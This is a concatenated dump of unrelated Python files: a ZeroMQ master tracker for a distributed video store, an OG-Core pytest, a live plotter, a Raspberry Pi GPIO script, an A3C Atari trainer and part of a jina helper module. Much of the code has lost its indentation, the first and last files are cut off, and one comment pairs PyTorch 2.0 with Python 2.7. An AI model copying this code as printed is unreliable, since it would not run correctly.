s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def clientRequestHandler(message, syncLock):
global masterDataFile
global dataKeepersState
syncLock.acquire()
if message[0] == "upload":
# Checks whether there is a free port (j) for each ip (i)
for i in dataKeepersState:
for j in dataKeepersState[i]:
if(dataKeepersState[i][j]):
dataKeepersState[i][j] = False # Make Port Busy
syncLock.release()
print("Datakeeper with ip " + i + " and port " + str(j) + " is now busy")
return [i,j,message[1]]
elif message[0] == "download":
for i in masterDataFile:
for j in masterDataFile[i]:
for k in masterDataFile[i][j]:
if k == message[1] and dataKeepersState[i][j]:
dataKeepersState[i][j] = False # Make Port Busy
syncLock.release()
print("Datakeeper with ip " + i + " and port " + str(j) + " is now busy")
return [i,j,message[1]]
elif message[0] == "downloaded":
dataKeepersState[message[1]][message[2]] = True
print("Datakeeper with ip " + message[1] + " and port " + str(message[2]) + " is now available")
syncLock.release()
return ["confirmed"]
syncLock.release()
return None
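# Message protocol sketch (inferred from clientRequestHandler above, illustrative only):
#   ["upload", "movie.mp4"]    -> [ip, port, "movie.mp4"] for a free datakeeper port
#   ["download", "movie.mp4"]  -> [ip, port, "movie.mp4"] for a free port holding the file
#   ["downloaded", ip, port]   -> ["confirmed"], marking that port as available again
# If no suitable datakeeper port is free, None is returned.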
def masterClientConnection(clientSocket, syncLock):
global masterDataFile
global dataKeepersState
# Sending/Receiving data from client
# Wait for next request from client
message = []
try:
message = clientSocket.recv_pyobj()
print("A client is " + message[0] + "ing " + message[1])
except zmq.error.Again:
return
# TODO (friedPotato7): clientRequestHandler takes message = [upload/download, filename.mp4]
# and returns [ip, port, filename], e.g.
# port = ["tcp://localhost:", 8000, "Alberto Mardegan - Selfie del futuro.mp4"]
port = clientRequestHandler(message, syncLock)
clientSocket.send_pyobj(port)
def masterDatakeeperConnection(masterIndex, datakeeperSocket, numberOfProcessesPerDataKeeper, syncLock, successMsgDataKeeperSocket):
global masterDataFile
global dataKeepersState
global filesDictionary
global iAmAliveDict
global doNreplicates
try:
data = successMsgDataKeeperSocket.recv_string()
successMsgDataKeeperSocket.send_string("done")
messagedata, ip, port, fileName = data.split()
except zmq.error.Again:
messagedata = "-1"
pass
if messagedata == "2":
syncLock.acquire()
print("Master #"+ str(masterIndex)+": file with name: " + fileName +" has been successfully uploaded on machine with ip: "+ ip+"\n" )
doNreplicates = False # Unlock doNreplicates once the source machine has sent the file to the machine_to_copy
addFile(ip,port,fileName, numberOfProcessesPerDataKeeper)
dataKeepersState["tcp://"+ip+":"][port] = True
for i in range(numberOfProcessesPerDataKeeper):
masterDataFile["tcp://"+ip+":"][str(8000+i)].append(fileName)
syncLock.release()
if messagedata == "3":
syncLock.acquire()
dataKeepersState[ip][port] = True
# doNreplicates = False
syncLock.release()
try:
string = datakeeperSocket.recv_string()
topic, messagedata, ip, NodeIndex, processesIndex = string.split()
except zmq.error.Again:
return
if topic == "1" and messagedata == "1":
iAmAliveDict[ip] += 1
# print("Datakeeper with ip " + ip + " is alive")
def addFile(ip, port, fileName, numberOfProcessesPerDataKeeper):
global filesDictionary
if(len(filesDictionary[fileName]) == 0):
temp = nested_dict(1, list)
filesDictionary[fileName].append(temp)
filesDictionary[fileName].append(0)
if(len(filesDictionary[fileName][0]["tcp://"+ip+":"]) == 0):
filesDictionary[fileName][1] += 1
for i in range(numberOfProcessesPerDataKeeper):
filesDictionary[fileName][0]["tcp://" +
ip + ":"].append(str(8000+i))
def initialzeClientMasterConnection(masterIndex, startingPortMasterClient):
# Bind ports for clients
clientPort = startingPortMasterClient+masterIndex
context = zmq.Context()
clientSocket = context.socket(zmq.REP)
clientSocket.bind("tcp://" + masterIP + ":%s" % clientPort)
clientSocket.RCVTIMEO = 1
return clientSocket
def initialzeDatakeeperMasterConnection(masterIndex, numberOfNodes_Datakeeper, numberOfProcessesPerDataKeeper, syncLock):
global masterHeadFinished
global masterDataFile
global dataKeepersState
global iAmAliveDict
global headDataKeepers
# Bind ports for datakeeper
print("Master #"+ str(masterIndex) + " is waiting for Datakeepers")
headDataKeepers=[]
if masterIndex == 0:
context1 = zmq.Context()
masterReceiver = context1.socket(zmq.PULL)
masterReceiver.bind("tcp://" + masterIP + ":%s" % str(17777)) # getIp()
initializedDataKeepers = 0
syncLock.acquire()
while initializedDataKeepers < numberOfNodes_Datakeeper * numberOfProcessesPerDataKeeper:
address = masterReceiver.recv_pyobj()
print("Datakeeper with address " + str(address["ip"]) + " is connected to Master#" + str(masterIndex))
for i in range(numberOfProcessesPerDataKeeper):
masterDataFile["tcp://"+address["ip"]+":"][str(8000+i)] = []
dataKeepersState["tcp://" +
address["ip"]+":"][str(8000+i)] = True
if address["head"]:
iAmAliveDict[address["ip"]] = 0
headDataKeepers.append(
"tcp://"+str(address["ip"])+":"+str(5556))
initializedDataKeepers += 1
masterHeadFinished = 1
syncLock.release()
else:
while masterHeadFinished == 0:
pass
context = zmq.Context()
datakeeperSocket = context.socket(zmq.SUB)
for j in headDataKeepers:
datakeeperSocket.connect(j)
topicfilter = "1"
datakeeperSocket.setsockopt_string(zmq.SUBSCRIBE, topicfilter)
datakeeperSocket.RCVTIMEO = 1
return datakeeperSocket
def nReplicatesMasterDatakeeper(masterIndex):
context = zmq.Context()
socket = context.socket(zmq.PUB)
port = 10000+masterIndex
socket.bind("tcp://" + masterIP + ":%s" % port)
return socket
def successMsgSocket(masterIndex):
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://" + masterIP + ":" + str(15000+masterIndex))
socket.RCVTIMEO = 1
return socket
def makeNReplicates(syncLock, nrSocket, n, masterIndex):
global doNreplicates
global filesDictionary
global masterDataFile
global dataKeepersState
syncLock.acquire()
if(len(filesDictionary) == 0):
doNreplicates = False
syncLock.release()
return
syncLock.release()
noNreplicatesRequired = True
syncLock.acquire()
for file in filesDictionary:
# get the instance count of this file
instance_count = filesDictionary[file][1]
if instance_count < n:
for i in range(n-instance_count):
source_machine = getSourceMachine(file,syncLock)
if source_machine == False:
print("All source Machines are busy failed to Make n Replicates")
break
machine_to_copy_1 = selectMachineToCopyTo(syncLock, file)
if machine_to_copy_1 == False:
dataKeepersState[source_machine[1]
][source_machine[2]] = True
print("All Machines_To_Copy are busy failed to Make n Replicates")
break
noNreplicatesRequired = False
NotifyMachineDataTransfer(
source_machine, machine_to_copy_1, nrSocket)
print(
"----------------------------------------------------------------------------------")
print(
"-- N Replicates Loading !!! --")
print(
"----------------------------------------------------------------------------------")
if(noNreplicatesRequired):
doNreplicates = False
syncLock.release()
def getSourceMachine(file, syncLock):
global filesDictionary
global dataKeepersState
# getFreeMachine=False
srcMachine = []
srcMachine.append(file)
syncLock.acquire()
for ip in filesDictionary[file][0]:
for port in filesDictionary[file][0][ip]:
if dataKeepersState[ip][port]:
# getFreeMachine=True
dataKeepersState[ip][port] = False
syncLock.release()
srcMachine.append(ip)
srcMachine.append(port)
print("Source Machine Found at ip: " + str(ip) + str(port))
return srcMachine
syncLock.release()
return False
def selectMachineToCopyTo(syncLock, fileName):
global masterDataFile
global dataKeepersState
notFound = True
# selectMachine=False
# while selectMachine==False:
syncLock.acquire()
for i in masterDataFile:
for j in masterDataFile[i]:
notFound = True
for k in masterDataFile[i][j]:
if k == fileName:
notFound = False
break
if notFound == True and dataKeepersState[i][j]:
dataKeepersState[i][j] = False # Make Port Busy
syncLock.release()
# selectMachine=True
print("Machine to Copy Found at ip: " + str(i) + str(j))
return[i, j]
syncLock.release()
return False
def NotifyMachineDataTransfer(source_machine, machine_to_copy,nrSocket):
msgToSrcMachine=[str(machine_to_copy[0])+machine_to_copy[1],source_machine[0],"source_machine",str(source_machine[1]),str(source_machine[2])]
topic = 1
    # send the source machine the destination (machine_to_copy's ip and port), the filename,
    # and a role flag so it knows it is the source machine
nrSocket.send_string("%d %s %s %s %s %s" % (topic, str(
machine_to_copy[0])+machine_to_copy[1], source_machine[0], "source_machine", str(source_machine[1]), str(source_machine[2])))
print("Source machine is notified to send the file to Machine_to_copy")
def masterTracker(masterIndex, numberOfNodes_Datakeeper, numberOfProcessesPerDataKeeper, startingPortMasterClient, syncLock, replicatesCount):
global doNreplicates
global masterHeadFinished
global masterDataFile
global dataKeepersState
global filesDictionary
global iAmAliveDict
global headDataKeepers
timerCounter = 0
clientSocket = initialzeClientMasterConnection(
masterIndex, startingPortMasterClient)
datakeeperSocket = initialzeDatakeeperMasterConnection(
masterIndex, numberOfNodes_Datakeeper, numberOfProcessesPerDataKeeper, syncLock)
# nReplicates Master Datakeeper Connection
nrSocket = nReplicatesMasterDatakeeper(masterIndex)
successMsgDataKeeperSocket = successMsgSocket(masterIndex)
startTime = time.time()
while True:
# Connecting with client
masterClientConnection(clientSocket, syncLock)
# Connecting with data
masterDatakeeperConnection(masterIndex, datakeeperSocket,
numberOfProcessesPerDataKeeper, syncLock, successMsgDataKeeperSocket)
if time.time() - startTime > 1:
timerCounter += 1
syncLock.acquire()
willDel = []
for ip in iAmAliveDict:
if iAmAliveDict[ip]+50 < timerCounter:
if dataKeepersState["tcp://"+ip+":"][str(8000)]==True :
print("Datakeeper on ip: " + ip + " is dead, removing it from Master shared memory...")
del masterDataFile["tcp://"+ip+":"]
del dataKeepersState["tcp://"+ip+":"]
willDel.append(ip)
for i in filesDictionary:
filesDictionary[i][1] -= 1
del filesDictionary[i][0]["tcp://"+ip+":"]
else:
iAmAliveDict[ip] = timerCounter
for i in willDel:
del iAmAliveDict[i]
syncLock.release()
startTime = time.time()
syncLock.acquire()
if doNreplicates == False:
doNreplicates = True
makeNReplicates(syncLock, nrSocket, replicatesCount, masterIndex)
syncLock.release()
def main():
##############################################################################################################################################
################# PLEASE EITHER HARDCODE THE MASTER IP AND COMMENT THE FOLLOWING INPUT BLOCK OR INPUT THEM THROUGH CLI ###################
##############################################################################################################################################
print("/////////////////////////////////////////////////////////////////////")
print("//////////////// Please enter the master server IP //////////////////")
print("/////////////////////////////////////////////////////////////////////")
    global masterIP  # the tracker threads read masterIP as a module-level global
    masterIP = input()
##############################################################################################################################################
    # number of master tracker threads
    numberOfThreadsOfMaster = 5
    # number of processes per data keeper node
    numberOfprocessesOfNodes = 3
numberOfNodes = 2 # number of nodes of data keeper
startingPortMasterClient = 7000 # first port between client/master
replicatesCount = 2 # count of replicates
threads = []
syncLock = RLock()
    for k in range(numberOfThreadsOfMaster):
t = Thread(target=masterTracker, args=(k, numberOfNodes, numberOfprocessesOfNodes, startingPortMasterClient, syncLock, replicatesCount))
threads.append(t)
for j in threads:
j.start()
for j in threads:
j.join()
print("Done!")
    while True:
        pass  # keep the main process alive
main()
|
test_run_example.py
|
"""
This test checks that a `run_ogcore_example.py` run of the model does not break
down (i.e., is still running) after 5 minutes (300 seconds).
"""
import multiprocessing
import time
import os
import sys
import pandas as pd
import importlib.util
import shutil
from pathlib import Path
import pytest
def call_run_ogcore_example():
cur_path = os.path.split(os.path.abspath(__file__))[0]
path = Path(cur_path)
roe_fldr = os.path.join(path.parent, "run_examples")
roe_file_path = os.path.join(roe_fldr, "run_ogcore_example.py")
spec = importlib.util.spec_from_file_location(
"run_ogcore_example.py", roe_file_path
)
roe_module = importlib.util.module_from_spec(spec)
sys.modules["run_ogcore_example.py"] = roe_module
spec.loader.exec_module(roe_module)
roe_module.main()
@pytest.mark.local
def test_run_ogcore_example(f=call_run_ogcore_example):
p = multiprocessing.Process(target=f, name="run_ogcore_example", args=())
p.start()
time.sleep(300)
if p.is_alive():
p.terminate()
p.join()
timetest = True
else:
print("run_ogcore_example did not run for minimum time")
timetest = False
print("timetest ==", timetest)
# Delete directory created by run_ogcore_example.py
cur_path = os.path.split(os.path.abspath(__file__))[0]
path = Path(cur_path)
roe_output_dir = os.path.join(
path.parent, "run_examples", "OUTPUT_BASELINE"
)
shutil.rmtree(roe_output_dir)
assert timetest
@pytest.mark.local
def test_run_ogcore_example_output(f=call_run_ogcore_example):
p = multiprocessing.Process(target=f, name="run_ogcore_example", args=())
p.start()
p.join() # this makes sure process finished running before going on
cur_path = os.path.split(os.path.abspath(__file__))[0]
path = Path(cur_path)
expected_df = pd.read_csv(
os.path.join(
path.parent, "run_examples", "expected_ogcore_example_output.csv"
)
)
# read in output from this run
test_df = pd.read_csv(
os.path.join(path.parent, "run_examples", "ogcore_example_output.csv")
)
# Delete directory created by run_ogcore_example.py
roe_output_dir = os.path.join(
path.parent, "run_examples", "OUTPUT_BASELINE"
)
shutil.rmtree(roe_output_dir)
pd.testing.assert_frame_equal(expected_df, test_df)
|
ioplotting.py
|
import time
import threading
import matplotlib.pyplot as plt
import math
global data
data = []
def dataInput():
start = time.time()
while True:
time.sleep(.03)
data.append(math.sin(time.time() - start)* (time.time() - start))
def plotter():
while True:
start = time.time()
length = len(data)
plt.scatter(range(length), data[0:length])
plt.pause(.1)
print(time.time() - start)
print('')
thread1 = threading.Thread(target = dataInput)
thread2 = threading.Thread(target = plotter)
thread1.start()
thread2.start()
|
interrupt_rising.falling_queue.py
|
#!/usr/bin/python3
import RPi.GPIO as GPIO
import time
import queue as Queue # https://pymotw.com/2/Queue/
from functools import partial
from threading import Thread
#------------------------------------------------------------------------
# use the raspi board pin number
#GPIO.setmode(GPIO.BOARD)
# use the gpio number
GPIO.setmode(GPIO.BCM)
Taster = 25
#------------------------------------------------------------------------
def interrupt_event(qF, qR, pin):
if GPIO.input(pin) == GPIO.HIGH:
qR.put(pin)
else:
qF.put(pin)
def rising_edge(queue):
while running:
if not queue.empty():
pin = queue.get()
zeit = time.strftime("%d.%m.%Y %H:%M:%S")
print("{} Rising edge detected on {}".format(zeit, pin))
time.sleep(0.5)
def falling_edge(queue):
while running:
if not queue.empty():
pin = queue.get()
zeit = time.strftime("%d.%m.%Y %H:%M:%S")
print("{} Falling edge detected on {}".format(zeit, pin))
time.sleep(0.5)
def main():
queueFalling = Queue.Queue()
queueRising = Queue.Queue()
rising_thread = Thread(target=rising_edge, args=(queueRising,))
falling_thread = Thread(target=falling_edge, args=(queueFalling,))
rising_thread.start()
falling_thread.start()
GPIO.setup(Taster, GPIO.IN)
GPIO.add_event_detect(Taster, GPIO.BOTH, callback=partial(interrupt_event, queueFalling, queueRising), bouncetime=200)
#keep script running
while True:
time.sleep(5)
if __name__ == '__main__':
try:
running = True
main()
except (KeyboardInterrupt, SystemExit):
running = False
print("\nQuit\n")
GPIO.cleanup()
|
a3c.py
|
"""
NOTES
After upgrading pytorch to 2.0, the combination of manual seeding and 'spawn' subprocessing
(the only choice on Python 2.7) causes CUDA Error 3.
See the related issue: https://github.com/pytorch/pytorch/issues/2517
"""
from __future__ import print_function
from collections import deque
import time
import os
import torch
from torch.autograd import Variable
# noinspection PyPep8Naming
import torch.nn.functional as F
import torch.multiprocessing as mp
import argparse
import shutil
from scipy.misc import imsave
from utils import FloatTensor, get_elapsed_time_str, SharedAdam
from envs import create_atari_env
from model import ActorCritic
# Parse program arguments
parser = argparse.ArgumentParser(description='Asynchronous Actor Critic')
parser.add_argument('--savedir', default='/tmp', type=str, metavar='PATH',
help='Dir name in which we save checkpoints')
parser.add_argument('--resume', dest='resume', type=str,
help="If checkpoint available, resume from latest")
parser.add_argument('--no-resume', dest='resume', action='store_false')
parser.set_defaults(resume=True)
parser.add_argument('--play', default='', type=str, metavar='PATH',
                    help='play your model with the path specified')
parser.add_argument('--rom', default='PongDeterministic-v4', type=str, metavar='GYMROMNAME',
help='Game ROM, e.g. PongDeterministic-v4 (default)')
args = parser.parse_args()
romname = args.rom
SEED = 1
# noinspection PyShadowingNames
def ensure_shared_grads(model, shared_model):
for param, shared_param in zip(model.parameters(),
shared_model.parameters()):
if shared_param.grad is not None:
return
shared_param._grad = param.grad
# noinspection PyShadowingNames
def train(rank, shared_model, optimizer):
"""
:param rank: worker-ID
:param shared_model: model to sync between workers
:param optimizer:
:return:
"""
# torch.manual_seed(SEED + rank)
    ac_steps = 20  # number of steps to roll out before each learning update
    max_episode_length = 10000  # cut an episode off after this many steps and reset the environment
gamma = 0.99
tau = 1.0
    max_grad_norm = 50.0  # clip gradients to this max norm to keep updates stable
    checkpoint_n = 20  # save a checkpoint every this many episodes; increase on slower machines
    env = create_atari_env(romname)  # create the game environment; romname selects which game
    env.seed(SEED + rank)  # seed the environment per worker for reproducibility
state = env.reset()
    # Wrap the pixel observation in a FloatTensor Variable; unsqueeze(0) adds a batch dimension
    state = Variable(torch.from_numpy(state).unsqueeze(0).type(FloatTensor), requires_grad=False)
    # Build the actor-critic model for this observation shape and action space
model = ActorCritic(env.observation_space.shape[0], env.action_space)
t = 0
    done = True  # start as if an episode has just ended so the LSTM state gets initialised
episodes = 0
reward_sum = 0
reward_sum1 = 0
start_time = time.time()
best_reward = -999
isbest = 0
cx = hx = None
while True:
model.load_state_dict(shared_model.state_dict()) # Pull the up to date model from the shared model
if done: # need to reset LSTM cell's input
# the LSTM units need their own output to feed into next step
# input (hence the name of the kind: recurrent neural nets).
# At the beginning of an episode, to get things started,
# we need to allocate some initial values in the required format,
# i.e. the same size as the output of the layer.
#
# see http://pytorch.org/docs/master/_modules/torch/nn/modules/rnn.html#LSTM
# for details
#
# Optionally, you can remove LSTM to simplify the code
# Think: what is the possible loss?
cx = Variable(torch.zeros(1, 256)).type(FloatTensor) # torch.zeros - setting the values to all zeros since there's nothing there yet
hx = Variable(torch.zeros(1, 256)).type(FloatTensor)
else:
cx = Variable(cx.data) # takes the last computed value for the next input
hx = Variable(hx.data) # basically this is to detach from previous comp graph
states = []
values = []
log_probs = []
rewards = []
entropies = []
for i in range(ac_steps): # Running through the 20 steps
t += 1
            v, logit, (hx, cx) = model((state, (hx, cx)))  # value estimate, action logits and new LSTM state
            states.append(state)
            prob = F.softmax(logit)  # action probabilities from the logits
            log_prob = F.log_softmax(logit)  # log-probabilities, computed separately for numerical stability
            entropy = -(log_prob * prob).sum(1, keepdim=True)  # entropy term encourages exploration
entropies.append(entropy)
            # detach() stops gradients from flowing back through the sampling step,
            # so back-propagation does not go through multinomial()
            action = prob.multinomial().detach()
# use the current action as an index to get the
# corresponding log probability
            log_prob = log_prob.gather(1, action)  # pick the log-probability of the action actually taken
            action = action.data[0, 0]  # convert the sampled action from a tensor to a plain Python int
            # Step the environment with the chosen action; it returns the next state, the reward,
            # the done flag and an info dict that we ignore
            state, reward, done, _ = env.step(action)
reward_sum += reward
            reward_sum1 += reward  # second accumulator, used for the checkpoint-window average
done = (done or t >= max_episode_length)
if done:
t_ = t
t = 0
state = env.reset()
episodes += 1
if episodes % 10 == 0:
time_str = time.strftime(
"%Hh %Mm %Ss", time.gmtime(time.time() - start_time))
print("Time {}, worker-{} episode {} "
"mean episode reward {}, "
"episode length {}".
format(time_str, rank, episodes, reward_sum / 10.0, t_))
reward_sum = 0.0
if episodes % checkpoint_n == 0:
ave_reward = reward_sum1 / checkpoint_n
if best_reward < ave_reward:
isbest = 1
best_reward = ave_reward
print("Saving checkpoint Time {}, worker-{} episode {} "
"mean episode reward {}, "
"episode length {} best_reward {}".
format(get_elapsed_time_str(), rank, episodes, ave_reward, t_, best_reward))
checkpoint_fname = os.path.join(
args.savedir,
args.rom + '_worker' + str(rank) + '_' + str(episodes))
save_checkpoint({'epoch': episodes,
'average_reward': ave_reward,
'time': time.time(),
'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict(),
}, isbest, checkpoint_fname)
reward_sum1 = 0.0
state = Variable(torch.from_numpy(state).unsqueeze(0).type(FloatTensor), requires_grad=False)
reward = max(min(reward, 1), -1)
values.append(v)
log_probs.append(log_prob) # Keep record
rewards.append(reward)
if done:
break
        # We reach here because either
        # i) an episode ended (e.g. game over), or
        # ii) we have explored ac_steps steps into the future and it is now
        #     time to look back and summarise the rollout
if done:
            R = torch.zeros(1, 1).type(FloatTensor)  # if the episode ended, the terminal state gets a value of 0
        else:
            value, _, _ = model((state, (hx, cx)))  # otherwise bootstrap: use the model to estimate the current state's value
R = value.data
values.append(Variable(R))
critic_loss = 0
actor_loss = 0
R = Variable(R)
gae = 0
for i in reversed(range(len(rewards))):
R = gamma * R + rewards[i] # R - longterm reward
advantage = R - values[i] # type: Variable, advantage against the average
# Compare the actual long-term reward. Note: we are reversing the
# experience of a complete trajectory. If the full length is 100
# (time indexes are among 0, 1, 2, ..., 99), and now i=50, that means
# we have processed all information in steps, 51, 52, ..., 99
# and R will contain the actual long term reward at time step 51 at
# the beginning of this step. The above computation injects the reward
# information in step 50 to R. Now R is the long-term reward at this
# step.
#
# So-called advantage is then the "unexpected gain/loss". It forms the base
# of evaluating the action taken at this step (50).
#
# critic_loss accumulates those "exceptional gain/loss" so that later we will
# adjust our expectation for each state and reduce future exceptions (to better
# evaluate actions, say, the advantage agains expectation is only meaningful
# when the expectation itself is meaningful).
critic_loss += 0.5 * advantage.pow(2)
# Generalized Advantage Estimation
# see https://arxiv.org/abs/1506.02438
# we can use advantage in the computation of the direction to adjust policy,
# but the manipulation here improves stability (as claims by the paper).
#
# Note advantage implicitly contributes to GAE, since it helps
# achieve a good estimation of state-values.
td_error = rewards[i] + gamma * values[i + 1].data - values[i].data
gae = gae * gamma * tau + td_error
# log_probs[i] is the log-probability(action-taken). If GAE is great, that
# means the choice we had made was great, and we want to make the same
# action decision in future -- make log_probs[i] large. Otherwise,
# we add log_probs to our regret and will be less likely to take the same
# action in future.
#
# entropy means the variety in a probabilistic distribution,
# to encourage big entropies is to make more exploration.
actor_loss -= (Variable(gae) * log_probs[i] + 0.01 * entropies[i])
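            # Hedged worked example (illustrative numbers, not from the original code),
            # with gamma=0.99, tau=1.0, rewards=[0, 1] and values=[0.5, 0.6, 0.0]:
            #   i=1: td_error = 1 + 0.99*0.0 - 0.6 = 0.400, gae = 0.400
            #   i=0: td_error = 0 + 0.99*0.6 - 0.5 = 0.094, gae = 0.400*0.99*1.0 + 0.094 = 0.490
            # so the action at step 0 is credited for its own surprise plus, discounted,
            # for the surprise observed one step later.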
        optimizer.zero_grad()  # clear old gradients before back-propagating the new loss
        total_loss = actor_loss + critic_loss * 0.5  # type: Variable
        total_loss.backward()  # back-propagate the combined loss
# this is to improve stability
torch.nn.utils.clip_grad_norm(model.parameters(), max_grad_norm)
        ensure_shared_grads(model, shared_model)  # push this worker's gradients to the shared model
optimizer.step()
def save_checkpoint(state, is_best, filename):
torch.save(state, filename)
if is_best:
dirname, _ = os.path.split(filename)
best_fname = os.path.join(dirname, 'best.tar')
shutil.copyfile(filename, best_fname)
# noinspection PyShadowingNames
def test(shared_model, render=0):
env = create_atari_env(args.rom)
if render == 1:
env.render()
model = ActorCritic(env.observation_space.shape[0], env.action_space)
model.eval()
state = env.reset()
state = torch.from_numpy(state)
reward_sum = 0
done = True
    # a quick hack to prevent the agent from getting stuck
episode_length = 0
cx = hx = None
while True:
episode_length += 1
# Sync with the shared model
if done:
model.load_state_dict(shared_model.state_dict())
cx = Variable(torch.zeros(1, 256).type(FloatTensor), volatile=True)
hx = Variable(torch.zeros(1, 256).type(FloatTensor), volatile=True)
else:
cx = Variable(cx.data, volatile=True)
hx = Variable(hx.data, volatile=True)
value, logit, (hx, cx) = model((Variable(
state.unsqueeze(0).type(FloatTensor), volatile=True), (hx, cx)))
prob = F.softmax(logit)
# print logit.data.numpy()
action = prob.max(1, keepdim=True)[1].data.cpu().numpy()
state, reward, done, _ = env.step(action[0, 0])
if render:
#env.render()
# Spits out images in the selected path
img = env.render('rgb_array')
imsave('/opt/tmp/img/pac-20000/frame_{:06d}.png'.format(episode_length), img)
"""
TEST-DEMO-ONLY
state_im = state.numpy()
state_im.transpose()
scipy.misc.imageio.saveim(state_im, filename-with-time-step-number)
#ffmpeg
END-WORKZONE
"""
done = done or episode_length >= 10000
reward_sum += reward
        # a quick hack to prevent the agent from getting stuck
# actions.append(action[0, 0])
# if actions.count(actions[0]) == actions.maxlen:
# done = True
if done:
print("Time {}, episode reward {}, episode length {}".
format(get_elapsed_time_str(), reward_sum, episode_length))
reward_sum = 0
episode_length = 0
state = env.reset()
time.sleep(60)
state = torch.from_numpy(state)
if __name__ == '__main__':
env = create_atari_env(args.rom)
# torch.manual_seed(SEED)
shared_model = ActorCritic(env.observation_space.shape[0], env.action_space)
shared_model.share_memory()
# print (shared_model.conv1._parameters['weight'].data.is_cuda)
optimizer = SharedAdam(shared_model.parameters(), lr=0.0001)
optimizer.share_memory()
if args.play:
if os.path.isfile(args.play):
print("=> loading checkpoint '{}'".format(args.play))
checkpoint = torch.load(args.play)
# args.start_epoch = checkpoint['epoch']
# best_prec1 = checkpoint['best_prec1']
shared_model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.play))
test(shared_model, render=1) # let it play the game
exit(0)
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
# args.start_epoch = checkpoint['epoch']
# best_prec1 = checkpoint['best_prec1']
shared_model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
mp.set_start_method('spawn')
processes = []
p = mp.Process(target=test, args=(shared_model, 0))
p.start()
processes.append(p)
    # This loop starts the training processes
    for rank in range(0, 1):  # the range decides how many training agents run simultaneously
print("Starting {}".format(rank))
p = mp.Process(target=train, args=(rank, shared_model, optimizer))
p.start() # Start point
processes.append(p)
for p in processes:
p.join()
|
helper.py
|
import asyncio
import functools
import inspect
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from collections.abc import MutableMapping
from datetime import datetime
from itertools import islice
from types import SimpleNamespace
from typing import (
Callable,
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
TypeVar,
TYPE_CHECKING,
)
from jina import __windows__
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
'CatchAllCleanupContextManager',
'download_mermaid_url',
'get_readable_size',
'get_or_reuse_loop',
'T',
]
if TYPE_CHECKING:
from docarray import DocumentArray
T = TypeVar('T')
def deprecated_alias(**aliases):
"""
    Usage: pass kwargs with the deprecated arg name as key and a tuple ``(new_name, deprecate_level)`` as value,
    where level 0 means a warning and level 1 means an exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from jina.excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
        :param aliases: kwargs with the deprecated arg name as key and a tuple (new_name, deprecate_level) as value.
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
def deprecated_method(new_function_name):
def deco(func):
def wrapper(*args, **kwargs):
warnings.warn(
f'`{func.__name__}` is renamed to `{new_function_name}`, the usage of `{func.__name__}` is '
f'deprecated and will be removed.',
DeprecationWarning,
)
return func(*args, **kwargs)
return wrapper
return deco
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for req in batch_iterator(data, batch_size, split_over_axis):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
